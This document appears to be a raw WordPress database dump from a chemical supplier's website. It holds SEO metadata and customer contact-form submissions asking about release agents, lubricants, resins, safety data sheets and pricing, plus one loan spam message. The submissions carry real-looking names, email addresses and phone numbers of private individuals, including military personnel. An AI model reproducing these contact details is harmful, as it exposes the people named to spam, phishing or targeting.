INSERT INTO `wp_postmeta` VALUES (39521, 4607, '_yoast_wpseo_focuskw_text_input', 'High Temperature Mold Release'); 
INSERT INTO `wp_postmeta` VALUES (39522, 4607, '_yoast_wpseo_focuskw', 'High Temperature Mold Release'); 
INSERT INTO `wp_postmeta` VALUES (39523, 4607, '_yoast_wpseo_title', 'High Temperature Mold Release | ReleaSys HTF | Advanced Mold Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (39524, 4607, '_yoast_wpseo_metadesc', 'ReleaSys HTF High Temperature Mold Release agent utilizes advanced chemistry to provide superior release of all high temp composites and elastomers.'); 
INSERT INTO `wp_postmeta` VALUES (39525, 4607, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (39526, 4607, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (39527, 4607, '_yoast_wpseo_linkdex', '96'); 
INSERT INTO `wp_postmeta` VALUES (39528, 4610, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39529, 4610, '_seq_num', '738'); 
INSERT INTO `wp_postmeta` VALUES (39530, 4610, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39531, 4610, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39532, 4610, '_field_1', 'Casey Callender'); 
INSERT INTO `wp_postmeta` VALUES (39533, 4610, '_field_10', 'International Paper'); 
INSERT INTO `wp_postmeta` VALUES (39534, 4610, '_field_2', 'casey.callender@ipaper.com'); 
INSERT INTO `wp_postmeta` VALUES (39535, 4610, '_field_8', '(985) 732-8479'); 
INSERT INTO `wp_postmeta` VALUES (39536, 4610, '_field_3', 'I have a one gallon glass bottle of pink/maroon colored liquid made by Miller-Stephenson. The lot appears to be 2574-102/260410 (not sure about the last 3 numbers). Part of the label is missing. Can you identify this material?'); 
INSERT INTO `wp_postmeta` VALUES (39537, 4610, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39538, 4610, '_sub_id', '4610'); 
INSERT INTO `wp_postmeta` VALUES (39539, 4611, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39540, 4611, '_seq_num', '739'); 
INSERT INTO `wp_postmeta` VALUES (39541, 4611, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39542, 4611, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39543, 4611, '_field_1', 'Alina Claire'); 
INSERT INTO `wp_postmeta` VALUES (39544, 4611, '_field_10', 'Cargill Incorporated'); 
INSERT INTO `wp_postmeta` VALUES (39545, 4611, '_field_2', 'gsm.source1@gsmsds.com'); 
INSERT INTO `wp_postmeta` VALUES (39546, 4611, '_field_8', '7863936232'); 
INSERT INTO `wp_postmeta` VALUES (39547, 4611, '_field_3', 'Hi,\r\nPlease send us the latest updated USA-OSHA(GHS) MSDS’s for the below mentioned products,\r\n\r\n1. MS-122N/CO2 PTFE Release Agent/Dry Lubricant [N/Av]\r\n2. MS-465N Acrylic Conformal Coating [N/Av]\r\n3. MS-122B,  DPMS-W0523A2, PTFE Release Agent/Dry Lubricant [N/Av]\r\n4. MS-238 Contact RE ANC Lube [MS-238]\r\n\r\nThanks,\r\nAlina Claire\r\ngsm.source1@gsmsds.com'); 
INSERT INTO `wp_postmeta` VALUES (39548, 4611, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39549, 4611, '_sub_id', '4611'); 
INSERT INTO `wp_postmeta` VALUES (39550, 4612, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39551, 4612, '_seq_num', '740'); 
INSERT INTO `wp_postmeta` VALUES (39552, 4612, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39553, 4612, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39554, 4612, '_field_1', 'Alina Claire'); 
INSERT INTO `wp_postmeta` VALUES (39555, 4612, '_field_10', 'Cargill Incorporated'); 
INSERT INTO `wp_postmeta` VALUES (39556, 4612, '_field_2', 'gsm.source1@gsmsds.com'); 
INSERT INTO `wp_postmeta` VALUES (39557, 4612, '_field_8', '7863936232'); 
INSERT INTO `wp_postmeta` VALUES (39558, 4612, '_field_3', 'Hi,\r\nPlease send us the latest updated USA-OSHA(GHS) MSDS’s for the below mentioned products,\r\n\r\n1. MS-122N/CO2 PTFE Release Agent/Dry Lubricant [N/Av]\r\n2. MS-465N Acrylic Conformal Coating [N/Av]\r\n3. MS-122B,  DPMS-W0523A2, PTFE Release Agent/Dry Lubricant [N/Av]\r\n4. MS-238 Contact RE ANC Lube [MS-238]\r\n\r\nThanks,\r\nAlina Claire\r\ngsm.source1@gsmsds.com'); 
INSERT INTO `wp_postmeta` VALUES (39559, 4612, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39560, 4612, '_sub_id', '4612'); 
INSERT INTO `wp_postmeta` VALUES (39562, 4614, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39563, 4614, '_seq_num', '741'); 
INSERT INTO `wp_postmeta` VALUES (39564, 4614, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39565, 4614, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39566, 4614, '_field_1', 'Byron Mobley'); 
INSERT INTO `wp_postmeta` VALUES (39567, 4614, '_field_10', 'Logistics Readiness Center'); 
INSERT INTO `wp_postmeta` VALUES (39568, 4614, '_field_2', 'byron.g.mobley.ctr@mail.mil'); 
INSERT INTO `wp_postmeta` VALUES (39569, 4614, '_field_8', '(912) 767-0225'); 
INSERT INTO `wp_postmeta` VALUES (39570, 4614, '_field_3', 'I need a SDS for cleaning compound MS-990 NSN:00-419-5004'); 
INSERT INTO `wp_postmeta` VALUES (39571, 4614, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39572, 4614, '_sub_id', '4614'); 
INSERT INTO `wp_postmeta` VALUES (39573, 4615, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (39574, 4615, '_seq_num', '320'); 
INSERT INTO `wp_postmeta` VALUES (39575, 4615, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39576, 4615, '_field_12', 'John Giancanelli'); 
INSERT INTO `wp_postmeta` VALUES (39577, 4615, '_field_13', 'Hastings Fiber Glass Products'); 
INSERT INTO `wp_postmeta` VALUES (39578, 4615, '_field_18', '1707000'); 
INSERT INTO `wp_postmeta` VALUES (39579, 4615, '_field_14', 'jgiancanelli@hfgp.com'); 
INSERT INTO `wp_postmeta` VALUES (39580, 4615, '_field_15', '(269) 945-9541'); 
INSERT INTO `wp_postmeta` VALUES (39581, 4615, '_field_16', 'For PTFE Release AgentDry Lubricant MS-122AD. Have you done any testing for damage on different types of rubber andor plastic? I have read the caution on the can to test for compatibility, but any testing done would be appreciated. Short and long term effects with regular use is the way it&#039;s being used. Thank you. '); 
INSERT INTO `wp_postmeta` VALUES (39582, 4615, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (39583, 4615, '_sub_id', '4615'); 
INSERT INTO `wp_postmeta` VALUES (39584, 4616, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (39585, 4616, '_seq_num', '321'); 
INSERT INTO `wp_postmeta` VALUES (39586, 4616, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39587, 4616, '_field_12', 'floyd groves'); 
INSERT INTO `wp_postmeta` VALUES (39588, 4616, '_field_13', 'retired'); 
INSERT INTO `wp_postmeta` VALUES (39589, 4616, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (39590, 4616, '_field_14', 'tanyagroves65@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (39591, 4616, '_field_15', '(901) 634-7405'); 
INSERT INTO `wp_postmeta` VALUES (39592, 4616, '_field_16', 'I am looking for a HIGH TEMPERATURE CLEAR epoxy coating for the intake manifold of a car engine with temperatures of 250 degrees.    Do you carry a such a product?   \nThank you.                                                              '); 
INSERT INTO `wp_postmeta` VALUES (39593, 4616, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (39594, 4616, '_sub_id', '4616'); 
INSERT INTO `wp_postmeta` VALUES (39595, 4617, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39596, 4617, '_seq_num', '742'); 
INSERT INTO `wp_postmeta` VALUES (39597, 4617, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39598, 4617, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39599, 4617, '_field_1', 'MCpl Cory Pinkney'); 
INSERT INTO `wp_postmeta` VALUES (39600, 4617, '_field_10', 'Department of National Defence Canada'); 
INSERT INTO `wp_postmeta` VALUES (39601, 4617, '_field_2', 'cory.pinkney@forces.gc.ca'); 
INSERT INTO `wp_postmeta` VALUES (39602, 4617, '_field_8', '(780) 840-8000'); 
INSERT INTO `wp_postmeta` VALUES (39603, 4617, '_field_3', 'Good day, \nCan you please let me know which product that you currently manufacture that is similar in applications as the MS-122DF PTFE Release Agent Dry Lubricant, NSN 9150-01-443-9003 as we are utilizing it for form in place seals using PPG PR 1750 or 870 of 1826 during maintenance of our CF 188 Hornet Fleet.  If you require more information, please contact me at your convenience by email or at the phone extension below.\nThank you in advance,\nMCpl Cory Pinkney\nACS Workshop, 401 Tactical Fighter Squadron\nDepartment of National Defence / Government of Canada\nCory.Pinkney@forces.gc.ca / Tel: 780-840-8000 ext: 3573 \n'); 
INSERT INTO `wp_postmeta` VALUES (39604, 4617, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39605, 4617, '_sub_id', '4617'); 
INSERT INTO `wp_postmeta` VALUES (39606, 4618, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39607, 4618, '_seq_num', '743'); 
INSERT INTO `wp_postmeta` VALUES (39608, 4618, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39609, 4618, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39610, 4618, '_field_1', 'Jean-Claude  Mauroux'); 
INSERT INTO `wp_postmeta` VALUES (39611, 4618, '_field_10', 'ABB Switzerland Ldt'); 
INSERT INTO `wp_postmeta` VALUES (39612, 4618, '_field_2', 'jean-claude.mauroux@ch.abb.com'); 
INSERT INTO `wp_postmeta` VALUES (39613, 4618, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (39614, 4618, '_field_3', 'Ladies and Gentlemen,\nWe are looking for electrical connector lubricant for 105°C or 115°C service temperature.\nDo you have some experience with such application like plug in contacts with 1000 rack in and out opperations?\nDo you have some technical paper dealing with this topic.\nWe would really appreciate your support for our request.\n\nKindest regards\nJ-C Mauroux\n+41 79 540 91 86'); 
INSERT INTO `wp_postmeta` VALUES (39615, 4618, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39616, 4618, '_sub_id', '4618'); 
INSERT INTO `wp_postmeta` VALUES (39617, 4619, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (39618, 4619, '_seq_num', '322'); 
INSERT INTO `wp_postmeta` VALUES (39619, 4619, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39620, 4619, '_field_12', 'Doug Eaton'); 
INSERT INTO `wp_postmeta` VALUES (39621, 4619, '_field_13', 'Electronetics'); 
INSERT INTO `wp_postmeta` VALUES (39622, 4619, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (39623, 4619, '_field_14', 'deaton@electronetics.us'); 
INSERT INTO `wp_postmeta` VALUES (39624, 4619, '_field_15', '(425) 355-1855'); 
INSERT INTO `wp_postmeta` VALUES (39625, 4619, '_field_16', 'Is there a dispenser available for the MS 907.  We have a customer that wants us to apply a small bead around the seam of a small switch.'); 
INSERT INTO `wp_postmeta` VALUES (39626, 4619, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (39627, 4619, '_sub_id', '4619'); 
INSERT INTO `wp_postmeta` VALUES (39628, 4620, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39629, 4620, '_seq_num', '744'); 
INSERT INTO `wp_postmeta` VALUES (39630, 4620, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39631, 4620, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39632, 4620, '_field_1', 'Darryl Thornton'); 
INSERT INTO `wp_postmeta` VALUES (39633, 4620, '_field_10', 'NACCO Aerospace'); 
INSERT INTO `wp_postmeta` VALUES (39634, 4620, '_field_2', 'darrylthornton@naccoaerospace.com'); 
INSERT INTO `wp_postmeta` VALUES (39635, 4620, '_field_8', '(256) 247-0911'); 
INSERT INTO `wp_postmeta` VALUES (39636, 4620, '_field_3', 'Looking for a source and pricing information for Epon 826 resin.'); 
INSERT INTO `wp_postmeta` VALUES (39637, 4620, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39638, 4620, '_sub_id', '4620'); 
INSERT INTO `wp_postmeta` VALUES (39639, 4621, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (39640, 4621, '_seq_num', '323'); 
INSERT INTO `wp_postmeta` VALUES (39641, 4621, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39642, 4621, '_field_12', 'Tom Senden'); 
INSERT INTO `wp_postmeta` VALUES (39643, 4621, '_field_13', 'Stinger Ghaffarian Technology'); 
INSERT INTO `wp_postmeta` VALUES (39644, 4621, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (39645, 4621, '_field_14', 'thomas.senden.ctr@usgs.gov'); 
INSERT INTO `wp_postmeta` VALUES (39646, 4621, '_field_15', '(605) 594-6873'); 
INSERT INTO `wp_postmeta` VALUES (39647, 4621, '_field_16', 'Hi,\r\nI am looking for a replacement for the tape head cleaner we have used in the past.  We have been using a product from APT Solutions, which as far as I can tell is now longer in business.  I don&#039;t know the exact composition, on the can it is listed as Xylene and 1,1,1 Trichloroethane (less than 11%).   Do you have any product that would replace this? It will be used on both glass and ferrite heads.  These head have not been in production for several decades, so I am very concerned that anything we use to clean the heads not damage them in any way.  Mostly we use alcohol to clean them, but over time a &quot;varnish&quot; builds up that is difficult at best to remove with alcohol.\r\nThanks for your time and effort in this matter,\r\nTom  '); 
INSERT INTO `wp_postmeta` VALUES (39648, 4621, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (39649, 4621, '_sub_id', '4621'); 
INSERT INTO `wp_postmeta` VALUES (39650, 4622, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (39651, 4622, '_seq_num', '324'); 
INSERT INTO `wp_postmeta` VALUES (39652, 4622, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39653, 4622, '_field_12', 'Miguel Barrera'); 
INSERT INTO `wp_postmeta` VALUES (39654, 4622, '_field_13', 'Delphi '); 
INSERT INTO `wp_postmeta` VALUES (39655, 4622, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (39656, 4622, '_field_14', 'miguel.barrera-saenz@delphi.com'); 
INSERT INTO `wp_postmeta` VALUES (39657, 4622, '_field_15', '(619) 402-1938'); 
INSERT INTO `wp_postmeta` VALUES (39658, 4622, '_field_16', 'HI   I sent an  e-mail to &#039;casales@mschem.com&#039;  on 06/19/17   in order to get vendor information system  and Supplier Quality Survey, Also  I need  your Quality Certificates . either  ISO / AS9100  you can call directly to my cell phone in Mexico  011 52 1 664 204 6225 \nThanks \nMiguel Barrera\n'); 
INSERT INTO `wp_postmeta` VALUES (39659, 4622, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (39660, 4622, '_sub_id', '4622'); 
INSERT INTO `wp_postmeta` VALUES (39661, 4623, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39662, 4623, '_seq_num', '745'); 
INSERT INTO `wp_postmeta` VALUES (39663, 4623, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39664, 4623, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39665, 4623, '_field_1', 'RUI NEIVA CORREIA'); 
INSERT INTO `wp_postmeta` VALUES (39666, 4623, '_field_10', 'AVIENair, ltd.'); 
INSERT INTO `wp_postmeta` VALUES (39667, 4623, '_field_2', 'RUI.NEIVA.CORREIA@GRUPOGRANDARTE.COM'); 
INSERT INTO `wp_postmeta` VALUES (39668, 4623, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (39669, 4623, '_field_3', 'Dear Sir /Madame\n\nWe are Grupo Grand’Arte in Portugal, and we operate as Inflight Catering Service under the designation of “Grand’Arte Gourmet Air”, providing not only Catering, but all Cabin Services.\nWe were asked by a Client if we can provide their Boeing Business Jets, BBJ,  with your MS-260, Plastic - Glass- Metal Cleaner.\nCan you please advise us ASAP if you have a representative here in Portugal/Europe, or if you can, and in what conditions, send us your products.\nPlease send us a Price and Conditions List.\nBest Regards \n\nRui Neiva Correia\nCEO\n\n\n  \n'); 
INSERT INTO `wp_postmeta` VALUES (39670, 4623, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39671, 4623, '_sub_id', '4623'); 
INSERT INTO `wp_postmeta` VALUES (39672, 4624, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39673, 4624, '_seq_num', '746'); 
INSERT INTO `wp_postmeta` VALUES (39674, 4624, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39675, 4624, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39676, 4624, '_field_1', 'Criss Norman'); 
INSERT INTO `wp_postmeta` VALUES (39677, 4624, '_field_10', 'MSDSonline'); 
INSERT INTO `wp_postmeta` VALUES (39678, 4624, '_field_2', 'cnorman@ehs.com'); 
INSERT INTO `wp_postmeta` VALUES (39679, 4624, '_field_8', '(914) 574-8035'); 
INSERT INTO `wp_postmeta` VALUES (39680, 4624, '_field_3', 'Request for GHS/ANSI-OSHA compliant [M]SDS (Batch : B4741-Part 2, Project_ID : HIS_49181)\r\n\r\nHello,\r\n\r\nI am looking to obtain the latest GHS/ANSI-OSHA complaint [M]SDS on behalf of a mutual client, Hisco, which I was not able to locate on your website.\r\n\r\nThe products are:\r\n\r\n1) Product_Name: EPIKURE 3282 CURING AGENT 1 QUART\r\n   Product Code: EPIKURE3282QT\r\n\r\n2) Product_Name: Epon 3140 Gallon 7 Lbs Net Wt (Hazmat)\r\n   Product Code: EPON3140GAL\r\n\r\n3) Product_Name: Epon 828 / 3140 400ml 2:1 Cartridge / Nozzle\r\n   Product Code: EPON828-3140400MLPK\r\n\r\nHisco is a US client and would prefer an GHS/ANSI-OSHA compliant [M]SDS if available. If not, we gladly accept the regulatory format your [M]SDS come in. For your records please see the attached authorization letter from Hisco.\r\n\r\nPlease email pdf versions of the [M]SDS to cnorman@ehs.com and if you could mention our Reference Number B4741-Part 2 in the subject line that would be appreciated. If the product is not hazardous and does not require [M]SDS, could you please email us an Exempt Letter indicating the same? \r\n\r\nIf you require any additional information, please do not hesitate to ask. Thank you for your time.\r\n\r\n\r\nRegards,\r\nCriss Norman.'); 
INSERT INTO `wp_postmeta` VALUES (39681, 4624, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39682, 4624, '_sub_id', '4624'); 
INSERT INTO `wp_postmeta` VALUES (39683, 4625, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39684, 4625, '_seq_num', '747'); 
INSERT INTO `wp_postmeta` VALUES (39685, 4625, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39686, 4625, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39687, 4625, '_field_1', 'Emily wang'); 
INSERT INTO `wp_postmeta` VALUES (39688, 4625, '_field_10', 'Raymond machinery Co.,Ltd'); 
INSERT INTO `wp_postmeta` VALUES (39689, 4625, '_field_2', 'emilywang@raymondmachinery.com'); 
INSERT INTO `wp_postmeta` VALUES (39690, 4625, '_field_8', '(086) 574-8901'); 
INSERT INTO `wp_postmeta` VALUES (39691, 4625, '_field_3', 'Dear Manager,\r\n\r\nThis is OEM steel or iron components manufacturer in China, Named Raymond Machinery Co.,Ltd.\r\nWe deal with producing finished spare parts by casting, forging &amp; machining process.\r\nThe main exporting country is U.K, Canada, America,Germany.\r\n\r\nIf you have planning to looking for new supplier for previous or new project, Trust Raymond Machinery Co.,Ltd could give you big support. \r\nPlease feel free to contact me by following information, I will offer you the best price and service. \r\n'); 
INSERT INTO `wp_postmeta` VALUES (39692, 4625, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39693, 4625, '_sub_id', '4625'); 
INSERT INTO `wp_postmeta` VALUES (39694, 4626, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39695, 4626, '_seq_num', '748'); 
INSERT INTO `wp_postmeta` VALUES (39696, 4626, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39697, 4626, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39698, 4626, '_field_1', 'Xian Liang'); 
INSERT INTO `wp_postmeta` VALUES (39699, 4626, '_field_10', 'Chemours'); 
INSERT INTO `wp_postmeta` VALUES (39700, 4626, '_field_2', 'xian.liang@chemours.com'); 
INSERT INTO `wp_postmeta` VALUES (39701, 4626, '_field_8', '(856) 540-3580'); 
INSERT INTO `wp_postmeta` VALUES (39702, 4626, '_field_3', 'Do You have 3M HFE-7100? if you have it,  Please provide the quote for 9 Gallon of 3M HFE-7100.  Thanks.'); 
INSERT INTO `wp_postmeta` VALUES (39703, 4626, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39704, 4626, '_sub_id', '4626'); 
INSERT INTO `wp_postmeta` VALUES (39705, 4627, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39706, 4627, '_seq_num', '749'); 
INSERT INTO `wp_postmeta` VALUES (39707, 4627, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39708, 4627, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39709, 4627, '_field_1', 'Tom Patterson'); 
INSERT INTO `wp_postmeta` VALUES (39710, 4627, '_field_10', 'CBS Television'); 
INSERT INTO `wp_postmeta` VALUES (39711, 4627, '_field_2', 'tom.patterson@cbs.com'); 
INSERT INTO `wp_postmeta` VALUES (39712, 4627, '_field_8', '(323) 575-2277'); 
INSERT INTO `wp_postmeta` VALUES (39713, 4627, '_field_3', 'Need a price quote for a case of MS-260 cleaner.\r\nIn the past I think we get CBS Corporate pricing but it&#039;s been a while since I placed my last order from you.'); 
INSERT INTO `wp_postmeta` VALUES (39714, 4627, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39715, 4627, '_sub_id', '4627'); 
INSERT INTO `wp_postmeta` VALUES (39716, 4628, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39717, 4628, '_seq_num', '750'); 
INSERT INTO `wp_postmeta` VALUES (39718, 4628, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39719, 4628, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39720, 4628, '_field_1', 'Katherine Swift'); 
INSERT INTO `wp_postmeta` VALUES (39721, 4628, '_field_10', 'Resin Obsession, LLC'); 
INSERT INTO `wp_postmeta` VALUES (39722, 4628, '_field_2', 'katherine@resinobsession.com'); 
INSERT INTO `wp_postmeta` VALUES (39723, 4628, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (39724, 4628, '_field_3', 'I would like to speak with you about private labeling a resin my company is looking to sell to our customer base.\r\n\r\nI would like a two part resin product that has enough surface tension that it can be applied to a horizontal surface and has doming properties.  (Yes, I realize it will likely run off the side, but this is something I&#039;m not expecting.)  A clear product is important, but low cost is even more important.  I anticipate reselling this to customers who want to purchase a large quantity of resin for multiple projects.  No VOC&#039;s would be a plus.  Anything that can ship worldwide without restrictions would be a bigger plus, but understand that may not happen.\r\n\r\nASTM certification is important and hope that you can work with us on that.\r\n\r\nWhat options do you have?\r\n\r\nBest,\r\nKatherine Swift\r\n'); 
INSERT INTO `wp_postmeta` VALUES (39725, 4628, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39726, 4628, '_sub_id', '4628'); 
INSERT INTO `wp_postmeta` VALUES (39727, 4629, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39728, 4629, '_seq_num', '751'); 
INSERT INTO `wp_postmeta` VALUES (39729, 4629, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39730, 4629, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39731, 4629, '_field_1', 'BusinessLoansFundedNow'); 
INSERT INTO `wp_postmeta` VALUES (39732, 4629, '_field_10', 'http://BusinessLoansFundedNow.com'); 
INSERT INTO `wp_postmeta` VALUES (39733, 4629, '_field_2', 'fundingteam+miller-stephenson.com@businessloansfundednow.com'); 
INSERT INTO `wp_postmeta` VALUES (39734, 4629, '_field_8', '930-616-7169'); 
INSERT INTO `wp_postmeta` VALUES (39735, 4629, '_field_3', 'Hi, letting you know that http://BusinessLoansFundedNow.com can find your business a SBA or private loan for $2,000 - $350K Without high credit or collateral. \r\n \r\nFind Out how much you qualify for here: \r\n \r\nhttp://BusinessLoansFundedNow.com/i.php?url=miller-stephenson.com&amp;id=e74 \r\n \r\nMinimum requirements include your company being established for at least a year and with current gross revenue of at least 120K. Eligibility and funding can be completed in as fast as 48hrs. Terms are personalized for each business so I suggest applying to find out exactly how much you can get on various terms. \r\n \r\nThis is a free service from a qualified lender and the approval will be based on the annual revenue of your business. These funds are Non-Restrictive, allowing you to spend the full amount in any way you require including business debt consolidation, hiring, marketing, or Absolutely Any Other expense. \r\n \r\nIf you need fast and easy business funding take a look at these programs now as there is limited availability. \r\n \r\nClick Here: http://BusinessLoansFundedNow.com/i.php?id=e74 \r\n \r\nHave a great day, \r\nThe Business Loans Funded Now Team \r\n \r\nunsubscribe/remove - http://businessloansfundednow.com/r.php?url=miller-stephenson.com&amp;id=e74'); 
INSERT INTO `wp_postmeta` VALUES (39736, 4629, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39737, 4629, '_sub_id', '4629'); 
INSERT INTO `wp_postmeta` VALUES (39738, 4630, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (39739, 4630, '_seq_num', '325'); 
INSERT INTO `wp_postmeta` VALUES (39740, 4630, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39741, 4630, '_field_12', 'Stephen Cho'); 
INSERT INTO `wp_postmeta` VALUES (39742, 4630, '_field_13', 'Century Precision Engineering, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (39743, 4630, '_field_18', 'N/A'); 
INSERT INTO `wp_postmeta` VALUES (39744, 4630, '_field_14', 'stephen@centurype.com'); 
INSERT INTO `wp_postmeta` VALUES (39745, 4630, '_field_15', '(310) 538-0015'); 
INSERT INTO `wp_postmeta` VALUES (39746, 4630, '_field_16', 'I used your product MS-143U (PN S0-10-0090) and I believed that this item is no longer available.\r\nWhat is the alternative for this product?\r\nPlease be advise.\r\nThank you.'); 
INSERT INTO `wp_postmeta` VALUES (39747, 4630, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (39748, 4630, '_sub_id', '4630'); 
INSERT INTO `wp_postmeta` VALUES (39749, 4631, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39750, 4631, '_seq_num', '752'); 
INSERT INTO `wp_postmeta` VALUES (39751, 4631, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39752, 4631, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39753, 4631, '_field_1', 'ryan ngai'); 
INSERT INTO `wp_postmeta` VALUES (39754, 4631, '_field_10', 'creativo engineering pte ltd'); 
INSERT INTO `wp_postmeta` VALUES (39755, 4631, '_field_2', 'creativo.ryan@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (39756, 4631, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (39757, 4631, '_field_3', 'Hi Miller, \r\n\r\nGood day. \r\nThis is Ryan Ngai from Creativo Engineering Pte Ltdm Singapore. \r\n\r\nWe are looking for 5 cans of 0.5k Krytox GPL207 grease. \r\nWould like to check with you if you are able to support us on the request ?\r\n\r\nLooking forward to your favorable reply soon. \r\n\r\nThank you.'); 
INSERT INTO `wp_postmeta` VALUES (39758, 4631, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39759, 4631, '_sub_id', '4631'); 
INSERT INTO `wp_postmeta` VALUES (39760, 4632, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39761, 4632, '_seq_num', '753'); 
INSERT INTO `wp_postmeta` VALUES (39762, 4632, '_action', 'submit'); 
